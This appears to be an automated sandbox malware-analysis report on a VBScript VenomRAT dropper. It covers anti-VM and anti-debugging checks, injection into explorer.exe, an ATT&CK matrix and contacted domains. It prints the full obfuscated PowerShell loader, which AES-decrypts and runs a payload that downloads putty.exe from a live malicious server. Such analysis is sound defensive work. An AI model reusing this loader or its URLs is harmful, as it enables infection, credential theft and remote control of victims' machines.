                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4117Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5765Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 452Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1727Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 859Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 351Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2867Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 899Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 848Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4852Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 2056Thread sleep count: 452 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 2196Thread sleep count: 1727 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 2196Thread sleep time: -172700s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 1876Thread sleep count: 859 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1876Thread sleep time: -85900s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 2508Thread sleep count: 273 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3312Thread sleep count: 330 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3312Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 3028Thread sleep count: 351 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3028Thread sleep time: -35100s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 2196Thread sleep count: 2867 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 2196Thread sleep time: -286700s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: explorer.exe, 00000005.00000000.1473844227.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
                Source: explorer.exe, 00000005.00000000.1474563069.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000005.00000000.1474563069.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
                Source: explorer.exe, 00000005.00000000.1474563069.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                Source: explorer.exe, 00000005.00000000.1474563069.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: explorer.exe, 00000005.00000000.1475786378.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
                Source: powershell.exe, 00000002.00000002.1438059694.0000021A43DC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
                Source: explorer.exe, 00000005.00000000.1477420367.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
                Source: explorer.exe, 00000005.00000000.1474563069.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
                Source: explorer.exe, 00000005.00000000.1474563069.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
                Source: explorer.exe, 00000005.00000000.1477420367.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
                Source: powershell.exe, 00000002.00000002.1438059694.0000021A43E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                Source: explorer.exe, 00000005.00000000.1475786378.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
                Source: explorer.exe, 00000005.00000000.1474563069.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                Source: explorer.exe, 00000005.00000000.1474563069.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                Source: explorer.exe, 00000005.00000000.1473844227.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000005.00000000.1474563069.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000005.00000000.1473844227.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\AppData\Roaming\putty.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\AppData\Roaming\putty.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_0054159D push dword ptr fs:[00000030h]4_2_0054159D
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_0060092B mov eax, dword ptr fs:[00000030h]4_2_0060092B
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00600D90 mov eax, dword ptr fs:[00000030h]4_2_00600D90
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_0056159D push dword ptr fs:[00000030h]7_2_0056159D
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_005C092B mov eax, dword ptr fs:[00000030h]7_2_005C092B
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_005C0D90 mov eax, dword ptr fs:[00000030h]7_2_005C0D90

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeFile created: daersgt.5.drJump to dropped file
                Source: C:\Windows\explorer.exeNetwork Connect: 94.156.177.51 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 194.85.61.76 80Jump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeThread created: C:\Windows\explorer.exe EIP: E81998Jump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtThread created: unknown EIP: 86E1998Jump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB2466BE1E327B203A6FEADD590E2D7A77C218709D3259C666B281C8D292197492CB5078DC69512F5FE4EA4467A62B291A42BF5576D12E86AAA0AFEB464D865F88ADAAB7D71DEBE3FE860AA8D5C1DC08F163020FD6DF7298ABF82642D73139A20C305891AC189D3EBB5DE86DD02CABDB425F68BC4');$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3)Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe" Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function randd($ezfv){return -split ($ezfv -replace '..', '0x$& ')};$unmwg = randd('153622473f3d34b5890b52ecde322f45e48ac8aa1ebe0731587b2a8d1eb5d7236a3c8b617fae24809377210fcdaa8256b284412dd11ec0b51122b1ef9f3232128a30da876225b23a0a21033a7e42ab95cc5acd28d3bac87a3c04863f7224792517962091f8b92df84d8699f4a63bb1eacd4e7f895f70b40175edcbd0858ec7333ae6a1ab73d0f0c2c360b3826ebcacacb9561c41af524f59c7fe7200cfe0c18e7cbe012252d4da348d9867636de8be7309771296ccea63dc8a00f1a6607291a9d940ac0fbe016e1469b44ffc93fb881ee1b5b55931b83474c09ba7d8326e069f30f7ef3ad15149ce314debf42606e2068557f79f77a379eaf734c27c2d3b854dbc0dc2752fbb6a8e67a31ef7ec67bd5a9b6bbc6b643ac644b7231b34788e58522ee2ff086384d09c1974cf97199996486fd9081c9c03779bc054d7dbd1ae0f032973099215905b2991eede39d374557e6bf7e27d2284ab23157862e2cbb4c7f31d6ea0f0594cbe9a410ebaa90180045174cfb119cd292b770ac51a76bd48feda376633d5d95f3c12fcd9a75fdd9d0dbde8551877fa8c38e86b9d006e2a51e2d327743db0ebecea698c101441cf173d4614d44daa2f4802c84fa83bdcb67ccfb31c07ab202a98c6b54200bbaee17899ed11e5b03e97add428647a41b73bf380058de3a0f98e978f9b83cab3c28fe019c43a7bb0d040d5ccd700b059f3734bd804ae813ec4e10d1ea58fcbb0ec6c4c8cde60cd35c6d4012eece60d1a1eb2466be1e327b203a6feadd590e2d7a77c218709d3259c666b281c8d292197492cb5078dc69512f5fe4ea4467a62b291a42bf5576d12e86aaa0afeb464d865f88adaab7d71debe3fe860aa8d5c1dc08f163020fd6df7298abf82642d73139a20c305891ac189d3ebb5de86dd02cabdb425f68bc4');$cvlpy=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((randd('5a456a634b52506273785a52424c5375')),[byte[]]::new(16)).transformfinalblock($unmwg,0,$unmwg.length)); & $cvlpy.substring(0,3) $cvlpy.substring(3)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function randd($ezfv){return -split ($ezfv -replace '..', '0x$& ')};$unmwg = randd('153622473f3d34b5890b52ecde322f45e48ac8aa1ebe0731587b2a8d1eb5d7236a3c8b617fae24809377210fcdaa8256b284412dd11ec0b51122b1ef9f3232128a30da876225b23a0a21033a7e42ab95cc5acd28d3bac87a3c04863f7224792517962091f8b92df84d8699f4a63bb1eacd4e7f895f70b40175edcbd0858ec7333ae6a1ab73d0f0c2c360b3826ebcacacb9561c41af524f59c7fe7200cfe0c18e7cbe012252d4da348d9867636de8be7309771296ccea63dc8a00f1a6607291a9d940ac0fbe016e1469b44ffc93fb881ee1b5b55931b83474c09ba7d8326e069f30f7ef3ad15149ce314debf42606e2068557f79f77a379eaf734c27c2d3b854dbc0dc2752fbb6a8e67a31ef7ec67bd5a9b6bbc6b643ac644b7231b34788e58522ee2ff086384d09c1974cf97199996486fd9081c9c03779bc054d7dbd1ae0f032973099215905b2991eede39d374557e6bf7e27d2284ab23157862e2cbb4c7f31d6ea0f0594cbe9a410ebaa90180045174cfb119cd292b770ac51a76bd48feda376633d5d95f3c12fcd9a75fdd9d0dbde8551877fa8c38e86b9d006e2a51e2d327743db0ebecea698c101441cf173d4614d44daa2f4802c84fa83bdcb67ccfb31c07ab202a98c6b54200bbaee17899ed11e5b03e97add428647a41b73bf380058de3a0f98e978f9b83cab3c28fe019c43a7bb0d040d5ccd700b059f3734bd804ae813ec4e10d1ea58fcbb0ec6c4c8cde60cd35c6d4012eece60d1a1eb2466be1e327b203a6feadd590e2d7a77c218709d3259c666b281c8d292197492cb5078dc69512f5fe4ea4467a62b291a42bf5576d12e86aaa0afeb464d865f88adaab7d71debe3fe860aa8d5c1dc08f163020fd6df7298abf82642d73139a20c305891ac189d3ebb5de86dd02cabdb425f68bc4');$cvlpy=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((randd('5a456a634b52506273785a52424c5375')),[byte[]]::new(16)).transformfinalblock($unmwg,0,$unmwg.length)); & $cvlpy.substring(0,3) $cvlpy.substring(3)Jump to behavior
                Source: explorer.exe, 00000005.00000000.1475661883.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1474302888.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1477420367.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000005.00000000.1474302888.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000005.00000000.1474302888.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: explorer.exe, 00000005.00000000.1473844227.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
                Source: explorer.exe, 00000005.00000000.1474302888.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 4.3.putty.exe.610000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.daersgt.5c0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.daersgt.5d0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.putty.exe.600e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.daersgt.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1493799106.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1730637355.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1422409130.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1730917327.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1493739867.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.1679840945.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 4.3.putty.exe.610000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.daersgt.5c0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.daersgt.5d0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.putty.exe.600e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.daersgt.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1493799106.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1730637355.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1422409130.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1730917327.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1493739867.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.1679840945.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information211
                Scripting
                Valid Accounts1
                Command and Scripting Interpreter
                211
                Scripting
                312
                Process Injection
                11
                Masquerading
                OS Credential Dumping411
                Security Software Discovery
                Remote Services1
                Archive Collected Data
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Exploitation for Client Execution
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                131
                Virtualization/Sandbox Evasion
                LSASS Memory131
                Virtualization/Sandbox Evasion
                Remote Desktop ProtocolData from Removable Media13
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts3
                PowerShell
                Logon Script (Windows)Logon Script (Windows)312
                Process Injection
                Security Account Manager3
                Process Discovery
                SMB/Windows Admin SharesData from Network Shared Drive4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Hidden Files and Directories
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture124
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                Software Packing
                Cached Domain Credentials113
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578026 Sample: #U0421#U043a#U0430#U043d-#U... Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 33 time.windows.com 2->33 35 spotcarservice.ru 2->35 37 3 other IPs or domains 2->37 45 Suricata IDS alerts for network traffic 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 5 other signatures 2->51 9 wscript.exe 1 2->9         started        12 daersgt 2->12         started        signatures3 process4 signatures5 61 VBScript performs obfuscated calls to suspicious functions 9->61 63 Suspicious powershell command line found 9->63 65 Wscript starts Powershell (via cmd or directly) 9->65 73 2 other signatures 9->73 14 powershell.exe 14 19 9->14         started        67 Antivirus detection for dropped file 12->67 69 Detected unpacking (changes PE section rights) 12->69 71 Machine Learning detection for dropped file 12->71 75 6 other signatures 12->75 process6 dnsIp7 41 spotcarservice.ru 94.156.177.51, 49717, 49783, 49789 NET1-ASBG Bulgaria 14->41 31 C:\Users\user\AppData\Roaming\putty.exe, PE32 14->31 dropped 43 Powershell drops PE file 14->43 19 putty.exe 14->19         started        22 conhost.exe 14->22         started        file8 signatures9 process10 signatures11 53 Antivirus detection for dropped file 19->53 55 Detected unpacking (changes PE section rights) 19->55 57 Machine Learning detection for dropped file 19->57 59 6 other signatures 19->59 24 explorer.exe 29 2 19->24 injected process12 dnsIp13 39 connecticutproperty.ru 194.85.61.76, 49795, 49954, 49968 RU-CENTERRU Russian Federation 24->39 29 C:\Users\user\AppData\Roaming\daersgt, PE32 24->29 dropped 77 System process connects to network (likely due to code injection or exploit) 24->77 79 Benign windows process drops PE files 24->79 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 24->81 file14 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs21%ReversingLabsScript-Macro.Trojan.VenomRAT
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\daersgt100%AviraHEUR/AGEN.1306978
                C:\Users\user\AppData\Roaming\putty.exe100%AviraHEUR/AGEN.1306978
                C:\Users\user\AppData\Roaming\daersgt100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\putty.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://www.pollensense.com/0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjs0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88c0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/pu0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putty.0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putty.ex0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdj0%Avira URL Cloudsafe
                http://constractionscity1991.lat/0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf880%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/p0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt0%Avira URL Cloudsafe
                http://spotcarservice.ru/0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/put0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cv0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putty.exep0%Avira URL Cloudsafe
                http://spotcarservice.ru/f0%Avira URL Cloudsafe
                http://connecticutproperty.ru/0%Avira URL Cloudsafe
                http://spotcarservice.r0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjsk0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/yumba/putty.exe0%Avira URL Cloudsafe
                http://spotcarservice.ru/fdjskf88cvt/y0%Avira URL Cloudsafe
